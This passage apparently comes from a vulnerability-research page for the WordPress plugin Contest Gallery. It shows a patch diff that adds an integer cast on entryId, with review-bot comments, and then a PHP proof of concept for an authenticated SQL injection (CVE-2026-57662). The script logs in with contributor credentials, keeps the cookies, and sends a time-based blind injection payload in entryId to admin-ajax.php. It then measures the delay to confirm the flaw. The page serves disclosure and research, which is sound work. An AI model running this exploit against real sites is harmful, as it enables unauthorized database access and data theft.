                 //echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size" alt="Show full size"><img src="'.$WPdestination.$value->Timestamp.'_'.$value->NamePic.'-300width.'.$value->ImgType.'" style="'.$padding.';position: absolute !important;max-width:none !important;" width="'.$WidthThumbPic.'"></a>';
                 echo "</div>";
                 }
--- a/contest-gallery/v10/v10-admin/gallery/sort-gallery-files.php
+++ b/contest-gallery/v10/v10-admin/gallery/sort-gallery-files.php
@@ -183,7 +183,7 @@
         echo "<div class='cg_backend_image_full_size_target_container'>";
         //echo $galleryFile['id'];
         echo '<div class="cg_backend_image_full_size_target_container_drag"></div>';
-        echo '<div class="cg_backend_image_full_size_target"><div class="cg_backend_image cg_backend_image_stage"><img class="cg'.$galleryFile['rThumb'].'degree cg_backend_image_preview" src="'.$wp_upload_dir['baseurl'].$galleryFile['large'].'"'.$imageWidthAttribute.$imageHeightAttribute.' alt="" ></div></div>';
+        echo '<div class="cg_backend_image_full_size_target"><div class="cg'.$galleryFile['rThumb'].'degree cg_backend_image" style="background: url('.$wp_upload_dir['baseurl'].$galleryFile['large'].') center center no-repeat;"></div></div>';
         echo "<input type='hidden' class='cg_position' data-cg-real-id=".$galleryFile['id']."  name='cg_position[".$galleryFile['id']."]' value='$order' >";
         echo "</div>";
     }else{
--- a/contest-gallery/v10/v10-admin/votes/show-votes.php
+++ b/contest-gallery/v10/v10-admin/votes/show-votes.php
@@ -320,7 +320,7 @@
             echo '</a>';
         }elseif(cg_is_is_image($ImgType)){
             echo '<div id="cgVotesImageVisualContent">';
-                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><div class="cg_backend_image cg_backend_image_stage"><img class="cg_backend_image_preview cg'.$rThumb.'degree" src="'.$imageThumb.'" alt="Show full size"></div></a>';
+                echo '<a href="'.$sourceOriginalImgShow.'" target="_blank" title="Show full size"><div class="cg'.$rThumb.'degree cg_backend_image" style="background: url('.$imageThumb.') center center no-repeat;"></div></a>';
             echo "</div>";
         }elseif($ImgType=='ytb'){
 	        echo '<div id="cgVotesImageVisualContent">';
--- a/contest-gallery/v10/v10-frontend/gallery-view.php
+++ b/contest-gallery/v10/v10-frontend/gallery-view.php
@@ -381,12 +381,27 @@
                 '.$cg_gallery_info.'
               </figure>';
         }elseif(cg_is_is_image($ImgType)){
+            if($rThumb === ' cg90degree' || $rThumb === ' cg270degree'){
+                $rotatedContainerRatioWidth = ($naturalHeight > 0) ? $naturalHeight : 1;
+                $rotatedContainerRatioHeight = ($naturalWidth > 0) ? $naturalWidth : 1;
+                $rotatedImageWidthPercent = ($naturalHeight > 0) ? round(($naturalWidth / $naturalHeight) * 100, 4) : 100;
+                $rotatedImageHeightPercent = ($naturalWidth > 0) ? round(($naturalHeight / $naturalWidth) * 100, 4) : 100;
+                $imageContent = '<div class="cg_append_container cg_rotated_image_container" style="width:100%; aspect-ratio: '.(int)$rotatedContainerRatioWidth.' / '.(int)$rotatedContainerRatioHeight.'; overflow:hidden;">
+                    <div
+                        role="img"
+                        aria-label="'.esc_attr($altAttr).'"
+                        class="cg_append cg_rotated_image_background skip-lazy'.$rThumb.'"
+                        itemprop="contentUrl"
+                        style="background: url('.esc_url($imgSrcLarge).') center center no-repeat; background-size: contain !important; width:'.$rotatedImageWidthPercent.'%; height:'.$rotatedImageHeightPercent.'%;" ></div>
+                </div>';
+            }else{
             $imageContent = '<img
                     src="'.$imgSrcLarge.'" '.$WidthAttribute.' '.$HeightAttribute.'
                     alt="'.esc_attr($altAttr).'"
                     loading="lazy"
                     class="'.$rThumb.'"
                     itemprop="contentUrl" '.$imgStyle.' >';
+            }
             $figure = '<figure class="cg_figure" itemscope itemtype="https://schema.org/'.$itemTypeObject.'Object">
                 '.$meta.'
                 '.$metaComment.'
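Review bot: the rotated branch escapes the image URL with `esc_url()` and the alt text with `esc_attr()`, but the unchanged `<img>` branch below it still emits `src="'.$imgSrcLarge.'"` raw; apply `esc_url()` there too so both branches are consistent. The aspect-ratio divisions are guarded against zero dimensions, which is correct.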
--- a/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
+++ b/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
@@ -1443,6 +1443,15 @@
                 }

                 $post_title_to_insert = (($WpPageTitle) ? $WpPageTitle : $post_title);
+                if(function_exists('cg1l_decode_nested_entities_for_plain_text')){
+                    $post_title_to_insert = cg1l_decode_nested_entities_for_plain_text($post_title_to_insert);
+                    if(empty($post_title_to_insert)){
+                        $post_title_to_insert = cg1l_decode_nested_entities_for_plain_text($post_title);
+                    }
+                }
+                if(empty($post_title_to_insert)){
+                    $post_title_to_insert = 'entry';
+                }
                 $post_title_to_insert = substr($post_title_to_insert,0,100);

                 if(!empty($selectSQL1->WpPageParent)){
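Review bot: the new fallback to `'entry'` avoids an empty post title, but the existing `substr($post_title_to_insert,0,100)` that follows is byte-based and can cut a multibyte UTF-8 character in half after entity decoding; `mb_substr()` would preserve the last character.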
--- a/contest-gallery/v10/v10-frontend/v10-get-data.php
+++ b/contest-gallery/v10/v10-frontend/v10-get-data.php
@@ -127,6 +127,7 @@
 if(!isset($entryId)){
     $entryId = 0;
 }
+$entryId = absint($entryId);

 if(empty($isFromOrderSummary)){// to go sure is initiated
 	$isFromOrderSummary = false;

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-57662 - Contest Gallery SQL Injection (Authenticated)

$target_url = 'http://example.com'; // CHANGE THIS to target WordPress URL
$username = 'contributor_user'; // CHANGE THIS to contributor-level username
$password = 'user_password'; // CHANGE THIS to user's password

// Step 1: Authenticate and get cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Craft SQL injection payload for entryId parameter
$sql_payload = "1' OR SLEEP(5)-- -"; // Time-based blind injection to test

$post_data = array(
    'action' => 'cg1l_ajax_frontend_get_data', // Vulnerable AJAX action (may need adjustment)
    'entryId' => $sql_payload,
    'nonce' => '' // Nonce might be required
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$t1 = microtime(true);
$response = curl_exec($ch);
$t2 = microtime(true);
curl_close($ch);

$execution_time = $t2 - $t1;
echo "SQL injection test execution time: " . $execution_time . " seconds\n";
if ($execution_time >= 5) {
    echo "[+] Vulnerability confirmed: Time-based SQL injection successful.\n";
} else {
    echo "[-] Vulnerability not confirmed via time-based test.\n";
}
?>
